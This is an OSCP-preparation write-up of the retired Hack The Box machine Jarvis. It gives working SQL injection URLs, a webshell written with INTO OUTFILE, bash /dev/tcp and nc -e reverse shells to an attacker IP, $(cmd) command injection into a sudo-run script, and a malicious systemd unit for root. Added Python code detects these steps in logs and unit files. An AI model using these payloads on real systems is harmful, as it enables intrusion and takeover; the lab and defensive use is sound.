OSCP Preparations – HTB Jarvis

Jarvis is a retired Hack The Box machine running Linux. The goal is to exploit its vulnerabilities to obtain the user and root flags.
We start with an nmap scan to get to know the target.
Classic Scan

Full Port Scan

The scan found several open ports; we begin enumeration with the web service on port 80, the most promising one.

Ports 22/tcp (OpenSSH 7.4p1), 80/tcp (Apache httpd) and 64999/tcp were found to be open.
Gobuster scan

Web enumeration

Source code analysis

We enumerated the web application and reviewed the page source; the Wappalyzer output gave nothing useful.
We then ran gobuster to find hidden files and directories.

Apart from the phpadmin directory there is nothing of interest; we note it for now and move on.
We examine the input fields and URL parameters of the site.
We come back to /room.php, which gobuster also found; it takes a GET parameter cod= in the URL, which is worth a closer look.

We first tried code injection in the input field without success. Injecting into the SQL query did not produce anything visibly different either: the page simply came back without the images and descriptions, i.e. an empty response.

To confirm the SQL injection we compare a false and a true condition.
False:
http://10.10.10.143/room.php?cod=1 and 1=2 -- -

True:

http://10.10.10.143/room.php?cod=1 and 1=1 -- -

As expected, the page only renders its normal content for the true condition.
Now that the injection is confirmed, let's see how to extract information.
We use ORDER BY to find the number of columns: ORDER BY 8 errors while ORDER BY 7 works, so the query has 7 columns.
http://10.10.10.143/room.php?cod=1 order by 8
Now we can use a UNION-based query to find which columns are reflected in the page.
http://10.10.10.143/room.php?cod=-1 union select 1,2,3,4,5,6,7

Let’s check the database version and the user we are running.
http://10.10.10.143/room.php?cod=-1 union select 1,database(),user(),4,5,6,7

The database server is MariaDB and the query runs as the DBadmin user.
Let's see if we can read a file using the load_file() function.
http://10.10.10.143/room.php?cod=-1 union select 1,load_file('/etc/passwd'),3,4,5,6,7

We can read it, so let's try writing a webshell. The PHP one-liner that goes in the second column was stripped from the rendered post; as the next step shows, it executes the command received in the exec POST parameter.
http://10.10.10.143/room.php?cod=-1 union select 1,'<PHP one-liner, stripped from the original rendering>',3,4,5,6,7 into outfile '/var/www/html/pwned.php'

Once this query has run, we can execute commands through the exec parameter with curl.
curl -X POST http://10.10.10.143/pwned.php --data-urlencode exec=whoami

Now we send the command that gives us a reverse shell, having started a listener first.
curl -X POST http://10.10.10.143/pwned.php --data-urlencode 'exec=bash -c "bash -i >& /dev/tcp/10.10.14.19/4747 0>&1"'

We got our shell.
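The request chain above leaves a clear trace in the web server's access log. As an added example, not part of the original post, the following detector runs over constructed Apache-format log lines that mirror the stages above (boolean probe, ORDER BY, UNION SELECT, LOAD_FILE, INTO OUTFILE) and reports which stage each source IP reached.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the original post).
SAMPLE_LOG = """\
10.10.14.19 - - [01/Jan/2024:10:00:01 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.19 - - [01/Jan/2024:10:00:05 +0000] "GET /room.php?cod=1%20and%201=2%20--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.19 - - [01/Jan/2024:10:00:09 +0000] "GET /room.php?cod=1%20order%20by%208 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.19 - - [01/Jan/2024:10:00:15 +0000] "GET /room.php?cod=-1%20union%20select%201,load_file('/etc/passwd'),3,4,5,6,7 HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
10.10.14.19 - - [01/Jan/2024:10:00:20 +0000] "GET /room.php?cod=-1%20union%20select%201,'',3,4,5,6,7%20into%20outfile%20'/var/www/html/pwned.php' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.19 - - [01/Jan/2024:10:00:25 +0000] "POST /pwned.php HTTP/1.1" 200 64 "-" "curl/7.68.0"
10.10.14.20 - - [01/Jan/2024:10:01:00 +0000] "GET /room.php?cod=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Each rule is named after the stage of the injection chain it corresponds to.
RULES = [
    ("boolean probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("column count (ORDER BY)", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("UNION-based extraction", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file read (LOAD_FILE)", re.compile(r"\bload_file\s*\(", re.I)),
    ("file write (INTO OUTFILE)", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]

def analyse(log_text):
    """Return (ip, timestamp, parameter, rule) for every query value that matches a rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query          # parse_qs URL-decodes the values
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                for rule, pattern in RULES:
                    if pattern.search(value):
                        findings.append((m["ip"], m["ts"], name, rule))
    return findings

def stages_by_ip(findings):
    """Map each source IP to the list of stages it triggered, in the order first seen."""
    stages = {}
    for ip, _ts, _param, rule in findings:
        stages.setdefault(ip, [])
        if rule not in stages[ip]:
            stages[ip].append(rule)
    return stages
```

An IP that reaches the file-write stage followed by a POST to a previously unseen .php path is the point at which the SQL injection has become remote code execution.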

Our privileges here are very limited, so we move on to local enumeration.

We found that the script /var/www/Admin-Utilities/simpler.py can be run with root privileges, so we analyzed it.
Looking at the script, it takes an IP address via the -p argument and passes it to os.system() to run ping. Several characters (& ; - ` |) are filtered to prevent injection, but '$', '(' and ')' are not. That allows command injection through bash command substitution, i.e. "$(cmd)". Let's check whether it works.

We test the injection in place of the IP address:
Entering $(whoami) returns pepper, so the script runs as the pepper user.

Next we inject a command that gives us a shell.

We got our shell here.
We got our user flag but we did not have root authorization.
To find non-default SUID files we used the command:
find / -perm -4000 2>/dev/null

We encountered /bin/systemctl. The systemctl binary is used to manage services; let's check GTFOBins for a privilege escalation through systemctl.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
sudo systemctl link $TF
sudo systemctl enable --now $TF

We adapted the command to our needs; it looks like this:

echo '[Service]
Type=notify
ExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.19 4700"
KillMode=process
Restart=on-failure
RestartSec=42s
[Install]
WantedBy=multi-user.target'  > new.service

sudo systemctl link /home/pepper/new.service

sudo systemctl start new

Starting the service through systemctl executed our reverse shell as root, so we obtained root privileges.
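Two things made this escalation possible: a SUID copy of systemctl and the ability to link a unit file from a home directory. As an added defensive check, not part of the original post, the block below compares `find / -perm -4000` output against a constructed baseline and audits unit files for the two signs of this abuse: a unit resolving outside the standard unit directories (what systemctl link on a home-directory file produces) and an Exec line that looks like a reverse shell.

```python
import re
from pathlib import PurePosixPath

# Baseline of SUID binaries expected on this host (constructed for the example).
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}
# Constructed excerpt of `find / -perm -4000 2>/dev/null` output.
SAMPLE_SUID = "/usr/bin/passwd\n/usr/bin/sudo\n/bin/systemctl\n/bin/su\n"

STANDARD_UNIT_DIRS = ("/etc/systemd/system", "/lib/systemd/system",
                      "/usr/lib/systemd/system", "/run/systemd/system")
# Command shapes typical of reverse-shell service units.
SUSPICIOUS_EXEC = re.compile(r"(\bnc\b|\bncat\b|\bsocat\b|/dev/tcp/|\bbash -i\b)")

# Constructed sample: unit name -> (path the unit file resolves to, its contents).
# The first mirrors the shape of the unit in the post; the other two are benign.
SAMPLE_UNITS = {
    "new.service": ("/home/pepper/new.service",
        '[Service]\nType=notify\nExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.19 4700"\n'
        '[Install]\nWantedBy=multi-user.target\n'),
    "ssh.service": ("/lib/systemd/system/ssh.service",
        "[Service]\nExecStart=/usr/sbin/sshd -D\n[Install]\nWantedBy=multi-user.target\n"),
    "backup.service": ("/etc/systemd/system/backup.service",
        "[Service]\nType=oneshot\nExecStart=/usr/local/bin/backup.sh\n"),
}

def unexpected_suid(find_output):
    """SUID binaries not in the baseline; /bin/systemctl is the one abused in the post."""
    return sorted(set(find_output.split()) - EXPECTED_SUID)

def audit_unit(resolved_path, contents):
    """Flag a unit whose file lives outside the standard directories or whose
    Exec* line matches a reverse-shell pattern."""
    findings = []
    path = PurePosixPath(resolved_path)
    if not any(str(path).startswith(d + "/") for d in STANDARD_UNIT_DIRS):
        findings.append("unit file outside standard unit dirs: %s" % path)
    for line in contents.splitlines():
        key, _, value = line.partition("=")
        if key.strip().startswith("Exec") and SUSPICIOUS_EXEC.search(value):
            findings.append("%s resembles a reverse shell: %s" % (key.strip(), value.strip()))
    return findings

def audit_all(units):
    """Only the units with at least one finding, keyed by unit name."""
    result = {}
    for name, (path, contents) in units.items():
        findings = audit_unit(path, contents)
        if findings:
            result[name] = findings
    return result
```

On a live host the resolved path comes from following the symlink systemctl link creates under /etc/systemd/system, and the SUID baseline should be taken from a known-good build of the same image.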
